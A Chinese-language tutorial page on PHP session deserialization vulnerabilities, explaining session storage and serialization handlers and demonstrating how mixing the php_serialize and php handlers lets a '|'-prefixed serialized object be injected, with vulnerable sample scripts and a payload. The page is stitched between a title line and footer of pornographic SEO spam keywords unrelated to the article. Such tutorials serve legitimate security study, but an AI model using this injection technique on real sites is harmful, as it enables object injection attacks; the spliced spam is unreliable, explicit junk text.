国产成人精品久久免费动漫-国产成人精品天堂-国产成人精品区在线观看-国产成人精品日本-a级毛片无码免费真人-a级毛片毛片免费观看久潮喷

您的位置:首頁技術文章
文章詳情頁

PHP session反序列化漏洞超詳細講解

瀏覽:241日期:2022-06-06 16:50:53
目錄
  • session請求過程
  • session_start的作用
  • session存儲機制
  • session反序列化漏洞

session請求過程

當第一次訪問網站時,Seesion_start()函數就會創建一個唯一的Session ID,并自動通過HTTP的響應頭,將這個Session ID保存到客戶端Cookie中。同時,也在服務器端創建一個以Session ID命名的文件,用于保存這個用戶的會話信息。當同一個用戶再次訪問這個網站時,也會自動通過HTTP的請求頭將Cookie中保存的Seesion ID再攜帶過來,這時Session_start()函數就不會再去分配一個新的Session ID,而是在服務器的硬盤中去尋找和這個Session ID同名的Session文件,將這之前為這個用戶保存的會話信息讀出,在當前腳本中應用,達到跟蹤這個用戶的目的。

session_start的作用

當會話自動開始或者通過session_start()手動開始的時候, PHP 內部會依據客戶端傳來的PHPSESSID來獲取現有的對應的會話數據(即session文件), PHP 會自動反序列化session文件的內容,并將之填充到 $_SESSION 超級全局變量中。如果不存在對應的會話數據,則創建名為sess_PHPSESSID(客戶端傳來的)的文件。如果客戶端未發送PHPSESSID,則創建一個由32個字母組成的PHPSESSID,并返回set-cookie。

session存儲機制

PHP中的Session中的內容并不是放在內存中的,而是以文件的方式來存儲的,存儲方式就是由配置項session.save_handler來進行確定的,默認是以文件的方式存儲。存儲的文件是以sess_sessionid來進行命名的,文件的內容就是Session值的序列化之后的內容。

了解一下PHP Session在php.ini中主要存在以下配置項:

在PHP中Session有三種序列化的方式,分別是php,php_serialize,php_binary,不同的引擎所對應的Session的存儲的方式不同

php處理器:

php_binary處理器:

php_serialize處理器:

session反序列化漏洞

PHP在session存儲和讀取時,都會有一個序列化和反序列化的過程,PHP內置了多種處理器用于存取 $_SESSION 數據,都會對數據進行序列化和反序列化,PHP中的Session的實現是沒有的問題的,漏洞主要是由于使用不同的引擎來處理session文件造成的。

存在$_session變量賦值

使用php_serialize引擎來存儲session

session.php

<?phperror_reporting(0);ini_set("session.serialize_handler","php_serialize");session_start();$_SESSION["username"] = $_GET["user"];echo "<pre>";var_dump($_SESSION);echo "</pre>";?>

session2.php

<?phperror_reporting(0);ini_set("session.serialize_handler","php");session_start();class user{    var $name;    var $age;    function __wakeup(){echo "hello ".$this->name." !";    }}?>

分析:

在session.php中存儲,這里要注意,因為session.php存儲器使用了php.serialize,而session.php使用的是php,因此漏洞的主要原因在于不同的引擎對于豎杠'| '的解析產生歧義。

對于php_serialize引擎來說'| '可能只是一個正常的字符;但對于php引擎來說'| '就是分隔符,前面是$_SESSION['username']的鍵名,后面是GET參數經過serialize序列化后的值。從而在解析的時候造成了歧義,導致其在解析Session文件時直接對' | '后的值進行反序列化處理。

payload.php

<?phpclass user {    var $name;    var $age;}$a = new user();$a ->age="888";$a ->name="cc";echo serialize($a);?>

漏洞復現:

|O:4:"user":2:{s:4:"name";s:2:"cc";s:3:"age";s:3:"888";}

然后使用session2.php讀取:直接讀文件就可以

到此這篇關于PHP session反序列化漏洞超詳細講解的文章就介紹到這了,更多相關PHP session反序列化漏洞內容請搜索以前的文章或繼續瀏覽下面的相關文章希望大家以后多多支持!

標簽: PHP
相關文章:
主站蜘蛛池模板: 俺来也欧美亚洲a∨在线 | 欧美成人观看免费版 | 亚洲欧美日韩三级 | 美女视频网站永久免费观看软件 | 欧美成人老熟妇暴潮毛片 | 欧美另类 videos黑人极品 | 综合欧美视频一区二区三区 | 欧美成人免费观看久久 | 成人午夜私人影院入口 | 国产精品久久久久久久久 | 高清色黄毛片一级毛片 | 日本韩国中文字幕 | 日韩在线视精品在亚洲 | 久久亚洲国产视频 | 在线精品国产一区二区 | 超清波多野结衣精品一区 | a级毛片免费观看在线播放 a级毛片免费看 | 欧美成人免费观看国产 | 女同日韩互慰互摸在线观看 | 黑色丝袜美美女被躁视频 | a级成人高清毛片 | 欧美成人中文字幕 | 荡女妇边被c边呻吟久久 | fc2ppv在线播放| 台湾三级香港三级在线中文 | 一级毛片美国一级j毛片不卡 | 成人精品免费网站 | 欧美日韩一区二区中文字幕视频 | 精品国产欧美另类一区 | 国产精品国色综合久久 | 国产伦久视频免费观看 视频 | 自偷自偷自亚洲永久 | 欧美一级毛片免费观看 | 99j久久精品久久久久久 | 国产精品久久久久久免费 | 久久狠| 在线亚洲播放 | 亚洲精品一区二区三区国产 | 免费播放特黄特色毛片 | 一级国产视频 | 国产精品日产三级在线观看 |